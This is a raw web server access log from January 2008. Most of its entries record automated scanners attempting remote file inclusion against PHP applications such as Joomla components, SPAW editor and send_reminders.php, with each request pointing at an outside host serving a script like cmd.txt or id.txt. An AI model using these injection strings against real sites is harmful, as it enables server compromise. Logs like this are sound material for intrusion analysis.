63.231.252.26 - - [10/Jan/2008:09:13:20 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.231.252.26 - - [10/Jan/2008:09:13:24 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.232.23.237 - - [10/Jan/2008:09:14:12 -0800] "GET /logs/access_071229.log/?displayCategory.php?basepath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.23.237 - - [10/Jan/2008:09:14:12 -0800] "GET /?displayCategory.php?basepath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.23.237 - - [10/Jan/2008:09:14:12 -0800] "GET /logs/?displayCategory.php?basepath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 200 29538 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.190.6 - - [10/Jan/2008:09:14:14 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.98.190.6 - - [10/Jan/2008:09:14:14 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.98.190.6 - - [10/Jan/2008:09:14:15 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.64.77 - - [10/Jan/2008:09:15:03 -0800] "GET //?mosConfig_absolute_path=http://www.kedaikopionline.com/chat/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.65" "www.dmulk.com"
212.159.3.233 - - [10/Jan/2008:09:15:22 -0800] "GET /logs/access_071229.log/index2.php?table=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.159.3.236 - - [10/Jan/2008:09:15:23 -0800] "GET /index2.php?table=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.159.3.235 - - [10/Jan/2008:09:15:23 -0800] "GET /logs/index2.php?table=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.22.33 - - [10/Jan/2008:09:15:26 -0800] "GET /tmp/sess_47c6756212fa7a947d494cee052e843c HTTP/1.0" 403 163 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.41.174.211 - - [10/Jan/2008:09:15:42 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.41.174.211 - - [10/Jan/2008:09:15:42 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.41.174.211 - - [10/Jan/2008:09:15:42 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.68.220 - - [10/Jan/2008:09:15:47 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.174.211 - - [10/Jan/2008:09:15:47 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.59.71.243 - - [10/Jan/2008:09:15:51 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.243 - - [10/Jan/2008:09:15:52 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.243 - - [10/Jan/2008:09:15:52 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.29.68.220 - - [10/Jan/2008:09:15:53 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.68.220 - - [10/Jan/2008:09:15:53 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.68.220 - - [10/Jan/2008:09:15:53 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.59.71.243 - - [10/Jan/2008:09:16:02 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.24.21 - - [10/Jan/2008:09:16:18 -0800] "GET /bikes/CreSTOC07/?D=D HTTP/1.0" 200 15280 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
146.83.144.170 - - [10/Jan/2008:09:18:18 -0800] "GET /logs/access_071225.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.fuori-corso.net/administration/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
146.83.144.170 - - [10/Jan/2008:09:18:24 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.fuori-corso.net/administration/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
146.83.144.170 - - [10/Jan/2008:09:18:29 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.fuori-corso.net/administration/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.180.94.132 - - [10/Jan/2008:09:20:03 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/mantaf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.180.94.132 - - [10/Jan/2008:09:20:04 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/mantaf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.180.94.132 - - [10/Jan/2008:09:20:04 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/mantaf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.180.94.132 - - [10/Jan/2008:09:20:10 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/mantaf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.180.94.132 - - [10/Jan/2008:09:20:11 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/mantaf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.180.94.132 - - [10/Jan/2008:09:20:11 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/mantaf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.166.231 - - [10/Jan/2008:09:21:06 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.autosud.it/modules/shop/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.166.231 - - [10/Jan/2008:09:21:07 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.autosud.it/modules/shop/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.166.231 - - [10/Jan/2008:09:21:07 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.autosud.it/modules/shop/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.9.218 - - [10/Jan/2008:09:23:09 -0800] "GET /logs/access_071205.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://aneuk.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.234.252.183 - - [10/Jan/2008:09:23:14 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.252.183 - - [10/Jan/2008:09:23:14 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.252.183 - - [10/Jan/2008:09:23:15 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.9.218 - - [10/Jan/2008:09:23:36 -0800] "GET /logs/access_071205.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.aneuk.com/test/oke.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.248.73 - - [10/Jan/2008:09:23:48 -0800] "GET //?mosConfig_absolute_path=http://www.kedaikopionline.com/chat/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.79" "www.dmulk.com"
66.98.248.73 - - [10/Jan/2008:09:23:49 -0800] "GET /logs//?mosConfig_absolute_path=http://www.kedaikopionline.com/chat/id.txt? HTTP/1.1" 200 29543 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.119.18 - - [10/Jan/2008:09:25:40 -0800] "GET /errors.php?error=http://www.unej.ac.id//content/data/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
70.86.119.18 - - [10/Jan/2008:09:25:40 -0800] "GET /logs/errors.php?error=http://www.unej.ac.id//content/data/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
62.245.170.43 - - [10/Jan/2008:09:26:02 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.proxycity.com/counter/.../response??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
75.125.15.210 - - [10/Jan/2008:09:26:02 -0800] "GET /logs/access_071229.log/index2.php?table=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.245.170.43 - - [10/Jan/2008:09:26:02 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.proxycity.com/counter/.../response??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
75.125.15.210 - - [10/Jan/2008:09:26:02 -0800] "GET /index2.php?table=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.15.210 - - [10/Jan/2008:09:26:02 -0800] "GET /logs/index2.php?table=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.152.180 - - [10/Jan/2008:09:30:01 -0800] "GET /logs/access_071216.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.gulzarii.com/myfolder/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:30:06 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:30:07 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:30:08 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:32:49 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
146.83.144.170 - - [10/Jan/2008:09:33:25 -0800] "GET /logs/access_071214.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.fuori-corso.net/administration/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.8.71 - - [10/Jan/2008:09:34:11 -0800] "GET /presto/?N=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:35:30 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:35:30 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:35:31 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.140.234.80 - - [10/Jan/2008:09:35:39 -0800] "GET /logs/access_071220.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.140.234.80 - - [10/Jan/2008:09:35:40 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:35:40 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.140.234.80 - - [10/Jan/2008:09:35:40 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:35:41 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.140.234.80 - - [10/Jan/2008:09:35:41 -0800] "GET /logs/access_071216.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:35:42 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:35:52 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:35:53 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:35:58 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:36:01 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:36:07 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:36:08 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:36:15 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:36:16 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:36:16 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:36:18 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:36:19 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:36:19 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:36:50 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:36:50 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:36:51 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:37:20 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:37:21 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:37:21 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.63.234 - - [10/Jan/2008:09:37:32 -0800] "GET /administrator/components/com_admin/excelwriter/OLE.php?mosConfig_absolute_path=http://www.paradiseradio.org/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
70.87.63.234 - - [10/Jan/2008:09:37:32 -0800] "GET /logs/administrator/components/com_admin/excelwriter/OLE.php?mosConfig_absolute_path=http://www.paradiseradio.org/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
146.83.144.170 - - [10/Jan/2008:09:38:01 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.fuori-corso.net/administration/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:38:09 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:38:16 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:38:21 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:38:22 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:38:22 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:38:23 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:38:27 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:38:29 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:38:31 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:38:33 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:38:34 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:38:34 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:38:39 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.87.131.98 - - [10/Jan/2008:09:38:46 -0800] "GET /logs/administrator/components/com_admin/excelwriter/OLE.php?mosConfig_absolute_path=http://www.paradiseradio.org/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
80.87.131.98 - - [10/Jan/2008:09:38:46 -0800] "GET /administrator/components/com_admin/excelwriter/OLE.php?mosConfig_absolute_path=http://www.paradiseradio.org/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:38:56 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.61.117 - - [10/Jan/2008:09:39:01 -0800] "GET /logs/access_071225.log/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://blueislandestates.com/Pics/mlr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.246.61.117 - - [10/Jan/2008:09:39:01 -0800] "GET /include/inc_ext/spaw/dialogs/table.php?spaw_root=http://blueislandestates.com/Pics/mlr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.246.61.117 - - [10/Jan/2008:09:39:01 -0800] "GET /logs/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://blueislandestates.com/Pics/mlr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:39:01 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:39:03 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:39:29 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:39:30 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:39:30 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:39:43 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:39:44 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.131.26 - - [10/Jan/2008:09:39:45 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
